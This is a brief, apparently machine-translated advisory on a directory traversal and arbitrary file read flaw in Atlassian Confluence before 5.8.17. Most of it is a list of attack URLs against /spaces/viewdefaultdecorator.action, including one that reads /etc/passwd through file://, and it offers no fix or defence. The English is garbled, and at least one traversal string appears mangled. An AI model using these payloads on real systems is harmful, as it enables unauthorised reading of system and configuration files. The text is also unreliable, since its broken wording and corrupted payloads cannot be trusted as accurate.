Affect the Assembly: Atlassian Confluence
Atlassian Confluence is less than 5. 8. 17 versions of the service exist in the arbitrary file read and directory traversal vulnerabilities
/spaces/viewdefaultdecorator. action? decoratorName=. Lists the current directory /spaces/viewdefaultdecorator. action? decoratorName=/ Lists the web Service’s root directory /spaces/viewdefaultdecorator. action? decoratorName=…/ Listed on the directory level(for some of the service is invalid) /spaces/viewdefaultdecorator. action? decoratorName=file:///etc/passwd Through the file Protocol can be done read system files and directories
But not root permissions, so the hazard has been reduced, but you can read the web Service’s configuration file, so the hazard of any course can not look down upon